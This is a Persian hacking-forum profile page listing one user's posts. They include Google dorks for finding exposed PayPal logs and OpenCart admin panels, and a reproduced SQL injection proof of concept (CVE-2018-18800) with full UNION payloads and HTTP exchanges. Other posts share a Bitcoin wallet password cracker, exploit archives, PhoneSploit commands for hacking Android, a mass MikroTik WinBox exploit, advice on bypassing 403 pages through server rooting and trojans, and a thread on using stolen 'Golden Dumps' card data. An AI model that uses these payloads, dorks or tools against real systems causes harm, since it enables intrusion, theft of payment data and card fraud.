رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Stubborn

ICG Programmer
  • تعداد ارسال ها

    146
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    39
  • Country

    ایران

آخرین بار برد Stubborn در اسفند 26 2021

Stubborn یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

148 Excellent

درباره Stubborn

  • درجه
    مسئول برنامه نویسی ICG
  • تاریخ تولد ۹۲/۱۱/۰۴

Converted

  • Name
    Mr.MZ
  • Main os
    Linux
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

2,089 بازدید کننده نمایه
  1. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دورد DORK Dork : intitle:"index of"PayPal.log>" #ME
  2. با سلام Dork #Dork : "Powered By OpenCart" #Dork : intext:OpenCart inurl:index.php?route=common/dashboard #Dork : intext:"Powered By OpenCart" -site:opencart.com -inurl:"Powered By OpenCart" -intitle:"OpenCart" -intitle:"powered by"
  3. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دورد DOrk # Dork: inurl:"/wp-content/plugins/wp-shopping-cart/" # Dork: inurl:cart.php?m=features&id= # Dork: filetype:log inurl:paypal # Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro # Dork: inurl:"paypal.log" ext:log # Dork: inurl:"paypal" intitle:"index of" backup | db | access -github # Dork: intitle:"index of" inurl:"paypal" log # Dork: inurl:inc_paypalstoremanager.asp # Dork: "Powered by DUpaypal" -site:duware.com # Dork: intext:OpenCart inurl:index.php?route=common/dashboard
  4. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دوره آموزش SQL Injection PayPal/Credit Card/Debit Card # Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18800 # POC: # 1) # http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] # #[PATH]/accomodation.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; #56 #57 #58 #59 } #60 #61 $accomodation = ' | ' . $_GET['q']; #62 ?> #... GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:55:17 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/index.php?p=rooms&q=[SQL] # #[PATH]/room_rates.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; #56 #57 #58 }else{ #59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`"; #60 } #61 #62 $accomodation = ' | ' . @$_GET['q']; #63 ?> #... GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:58:47 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 3) # http://localhost/[PATH]/admin/login.php # #[PATH]/admin/login.php #... #58 if (isset($_POST['btnlogin'])) { #59 //form has been submitted1 #60 #61 $uname = trim($_POST['email']); #62 $upass = trim($_POST['pass']); #...
  5. Stubborn

    Golden Dumps Creditcard Bank

    ببخشید سلام . اینم فکر کن بدرد مرحله اول کار بخوره ایا با این تفسیر چنین کاریو میتونم انجام بدم ؟
  6. Stubborn

    Golden Dumps Creditcard Bank

    عالی بود من یکم درمورش جستجو کردم عالی بود کارت هنوزم میشه استفاده کرد فکر کنم روی CKWPortal ها جواب بده https://www.cncbinternational.com/susip/maintenance-c.html جواب میگیریم ایا ؟ ,+
  7. Stubborn

    Bitcoin Wallet Pass Finder

    با سلام و احترام به عزیزان تیم Bitcoin Wallet Pass Finder به کمک این برنامه و ( کمبولیست , فرام ورک و DLL ) میتونین به راحتی پسور های خود را کرک کنید یا کلینت انجام بدید . BTC_PassCrack_140207_en.zip
  8. Stubborn

    CVE Archive Expilot 2014-2018

    با سلام گفتم با شمام به اشتراک بزارم شاید مفید واقع شد Security Vulnerability Database Expilot Archive Apache Struts 2 CVE-2017-5638 CVE-2018-11776 Apache Struts 2 CVE-2017-5638 Apache Struts 2 CVE-2017-9805 Apache Struts 2 CVE-2018-11776 Docker API RCE Drupalgeddon2 CVE-2018-7600 Heartbleed CVE-2014-0160 JBoss CVE-2015-7501 Jenkins CVE-2015-8103 Jenkins CVE-2016-0792 Shellshock CVE-2014-6271 Tomcat CVE-2017-12617 WebLogic CVE-2016-3510 WebLogic CVE-2017-10271 WebLogic CVE-2018-2894 WebSphere CVE-2015-7450 CVE Expilot.zip
  9. Stubborn

    Docker-CVE-2021-3156

    سلام و وقت بخیر خدمت دوستان و کاربران داکر چیست؟ یک ایمیج کانتینر داکر (Container Image) بسته‌ای اجرایی نرم‌افزاری با حجم کم و مستقل است که همه آنچه برای اجرای یک اپلیکیشن مورد نیاز است را در بر می‌گیرد. این موارد شامل کدها، زمان اجرا (Runtime)، ابزارهای سیستمی، کتابخانه‌های سیستمی و تنظیمات لازم است. این Imageها در زمان اجرا به کانتینرها تبدیل می‌شوند و این تبدیل در زمان اجرا روی موتور داکر (Docker‌ Engine) انجام می‌شود. در ادامه مقاله «داکر چیست» به شرح مسئله‌ و چالشی پرداخته شده که نیاز به ابداع داکر را ایجاب کرده است. docker-CVE-2021-3156 Send And Resive #Extert File #Cd File #Install Dockerfile #Install install_sudo1_9_5p1 $bash Run $bash build and Downlaoding docker-CVE-2021-3156-master.zip
  10. Stubborn

    پیدا کردن پسورد گوشی آیفون

    درود بله هست از نرم افزار جیلبریک میتونینن استفاده کنید.
  11. \ بکاپ / با سلام در غیر این صورت پیام خصوصی بدید.
  12. Stubborn

    واقعیت vs تصورات😂😂

    با سلام Ford Simulator 7.0 یه زمان این موضوع برای من به عنوان یه خیال بود با گذشت زمان تحقق پیدا کرد و بهش دست پیدا کردم . با یه کپی براداری ساده و یخورده خلاقیت برای خودم به صورت شخصی به زبانی که یاد گرفته بودم بازنویسی کردم و حالا نمیدونم واقعیته یا تصور . یا حق
  13. Stubborn

    403 bypass

    با سلام و اجازه از استادید و دوست عزیز اگه تارگت ایرانی نیست (خارجی هم انجام نمیشه .) پس به صورت انترواتیک (آکرودرماتیت آنتروپاتیک ) توضیح میدم در 1. شما جوابتونو در پیدا کردن Admin پیج خصوصی سایت یا ادمین Admin2 انجام میشه نیاز به بایپس هک هم پیدا نمیکنید. 2. اما شما با استفاده از لوگ ها و کوکی های به خاستتون میرسید و بازهم نیازی بایپس هک پیدا نمیکنید . 3. یا از طریف روت شدن به سرور و خواندن یوزر های بعد هیدر ها رو بایپس میکنید در htaccess دخیره میکنید و رفرش یا از طریق تروجان ها و بد افزار وب سایت ها میتونیید به خواستتون برسید و من Mysql رو بهتون پیشنهاد میدم که در پست زیر بهتون معرفی میکنم
  14. Stubborn

    هک اندروید

    با سلام در حال جستجو در سطح نت بودم که به یه بحث رسید که جالب بود و خوشحال میشم با شما اشتراک بزارمش بحث ما هک اندروید توسط پایتون است . میشه گفت از کاتولاین برگرفته است PhoneSploit نصب git clone #File cd PhoneSploit pip install colorama python2 main_linux.py دانلود : PhoneSploit-master.zip منبع github حسبی الله
  15. Stubborn

    Mass MikroTik WinBox Exploitation , CVE-2018-14847

    با سلام خدمت اساتید یه اکسپیلوت که با CIDR یا همان ای پی (IPV4) میکروتیک کار میکنه براتون اماده کردم امیدوارم باعث بالا رفتن سطح علمی شما شود . پ . خ : سوالی هست در خدمتم Mass MikroTik WinBox Exploitation , CVE-2018-14847 حسبی الله mikrotikbeast.rar

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...